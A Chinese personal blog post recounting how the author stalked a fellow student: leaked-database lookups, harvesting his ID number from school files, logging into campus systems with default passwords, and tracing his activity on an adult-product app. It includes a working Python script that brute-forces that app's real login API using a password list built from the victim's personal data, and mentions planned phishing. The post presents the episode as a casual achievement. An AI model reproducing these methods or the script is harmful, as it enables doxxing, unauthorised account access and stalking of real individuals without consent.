记一个蒟蒻的简单社工

本文最后更新于:2021年6月13日 凌晨

事情的起因较长,是个人问题,且和社工过程关系不大,所以就不详细写了。

总而言之,我想要找到一个和我在同一个团队的男同学的照片。

既然在同一个团队为什么要社工呢?因为我不认识他,而他认识我,且这个团队上一次开会已经是一年多以前了。

既然是同学为什么不问问交集的同学呢?因为不想被卖。

出于隐私保护,这里我们叫这个同学A

0x01 已知信息

我只从给我提到这个人的口中获知了A的名字,以及A是认识我的。

A认识我,所以我们可能有交集,但是我没有注意到他,所以在QQ上直接搜索A的名字。

image-20210605225237065

这里发现我们在同一个团队,获取到他的QQ账号以及年级专业。

0x02 扩展信息范围

  1. 获取到QQ号,那么直接想到的就是q绑库了,运气还不错,获取到如下信息(这里思维惯性了,其实既然知道年级专业,直接去翻各个班级群课程群可以直接获取到很多信息)

image-20210605225119143

  1. 先看看微博

    image-20210605225526776

    ​ 几乎没有可用信息。

    1. 手机号查看微信、支付宝等常用软件

    image-20210605225854222

    ​ 除了发现和另一个同学是情侣头像外没有任何可用信息。

    1. 手机号查询注册平台,查出来十多二十个,大部分都挺平常的,但是这个从未听说过的名字以及这个粉嫩的logo告诉我,不对劲,这怕是个变态lsp。(这些都是后话,感兴趣的可以自行搜索这个平台)

    image-20210605230325194

0x03 回过头来缩小范围

  1. 这个时候我突然想起,都是一个院系的,直接从学校内下手不是更容易吗

    这里省略一段翻群文件、学校通告的过程

    最终获得了这个同学的学号以及身份证号

image-20210605231006725

image-20210605231125337

​ 这里不得不批评一下学校收集信息的方式,这不相当于建了个公共的个人信息库吗。

  1. 有了学号事情就好办了,总所周知各个高校都有自己的各种教务系统,教务系统里面有可能会存放学生的照片,且学生账号多是以学号+学号或是学号+弱密码为初始验证,而且大部分同学并不会刻意去修改密码。

    这里扩展一下,既然大部分同学都不会去修改密码,那么会不会有有心的同学将整个学校没有修改密码的同学的数据全部爬取下来呢?

image-20210605231723010

​ 个人信息很多,却唯独没有我想要的照片。

​ 再往下翻翻

image-20210605231932358

​ 找到了宿舍信息,好家伙,刚好有一个同学我认识。这里我们管他叫B

​ 一个寝室的同学一起行动是很常见的,所以在B同学的空间朋友圈很有可能可以翻到A的照片

  1. 在B的空间翻了翻,很快就找到了疑似室友外出游玩的合照(这里就不放出来了),但是并不能直接确定这就是寝室合照(因为除了B我一个也不认识)。但是发现发空间的时间并不是寒暑假,所以必定需要请假。

  2. 使用前面获取到的学号信息查看他们4个人请假情况

    image-20210605232647577

    这里就只放一个图,因为都差不多,基本上可以断定是室友一起出行。(4个人只有一个人改了密码

  3. 到这里就只剩下最后一个问题了,那就是我只认识一个人,怎么确认剩下三个中谁才是我要找的人?

    正准备社工另外3个人的时候

    巧了,我室友刚吃完饭回来看到我在看空间照片,直接指出他认识其中一个C。而且还有一个同学D他虽然不认识却加了好友,根据D空间中的自拍,成功排除C、D,再加我认识的B,直接得到答案。(感叹一句,校园圈子真小

0x04 其他

按理说到这里我的目的以及达到了,但是回想起2.4步骤那个平台,好家伙。

平台截图就不放这里了(不符合我博客的风格,密日小怪兽,自行搜索

  1. 手机号查询的注册平台有可能有误,所以我决定手动查查看,结果发现这个平台web不能直接登录,必须下载APP,而这个APP是他们产品的遥控器,同学会玩啊。

  2. 下载APP,然后尝试A的手机号登录,提示密码错误,再使用我的手机号登录,提示用户不存在,到这里可以说是坐实他是这个平台的用户了,但是不知道有没有买产品(这个产品是给女生用的,啊这

  3. 不知道怎么描述我这个时候的想法,反正决定试试看能不能看到A在这个平台的信息,有点好奇A同学的操作

  4. 前期我获取了很多他的个人信息(这里没有完全罗列),根据这些个人信息,我们可以生成A的社工密码库,然后通过这个密码库来尝试爆破密码。

    手动尝试了十几二十次错误密码,并没有错误次数过多而冻结账号,也就是说爆破方案可以进行。

  5. 传统艺能,小黄鸟抓包

image-20210605234944100

  1. 编写代码,debug(代码简单,细节就不说了,直接看),生成社工密码库(工具生成,就不展示了

    # -*- coding: utf8 -*-
    import requests
    
    api = "https://www.sistalk.cn/api/user/login?viewer=0"
    headers = {
        'Sistalk-App-Area': 'CN',
        'Accept': 'application/vnd.monsterpub.v2+json',
        'Sistalk-App-Device': 'ffffffff-d3f5-9109-d3f5-910900000000',
        'Sistalk-Language': 'zh-CN',
        'User-Agent': 'MonsterPubCN/4.5.7(samsung:SM-N9600)/Android',
        'Accept-Language': 'zh-CN',
        'Content-Type': 'application/x-www-form-urlencoded',
        # 'Content-Length': '99',
        'Host': 'www.sistalk.cn',
        'Connection': 'Keep-Alive',
        'Accept-Encoding': 'gzip'
    }
    params = {
        'telephone': '13xxxxxxxxx',
        'password': 'xxx',
        'login_mode': 'phone',
        'uuid': 'ffffffff-d3f5-9109-d3f5-910900000000'
    }
    
    
    def login(pwd):
        params['password'] = pwd
        resp = requests.post(api, params=params, headers=headers)
        print(resp.text.encode('utf-8').decode('unicode_escape'))
        if '\\u5bc6\\u7801\\u9519\\u8bef' not in resp.text:
            print(pwd)
            return True
    
    
    if __name__ == '__main__':
        f = open('D:\\Code\\Script\\xxx.txt', 'r')
        for line in f.readlines():
            if login(line.strip()) == True:
                break

然而最后并没有成功爆破出密码。。。

  1. 尝试简单渗透平台,结果发现是阿里的waf,算了算了,要不起,溜溜球。
  2. 钓鱼,临近考试,没时间搞钓鱼了,未完待续……..

很累,不想搞了。


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!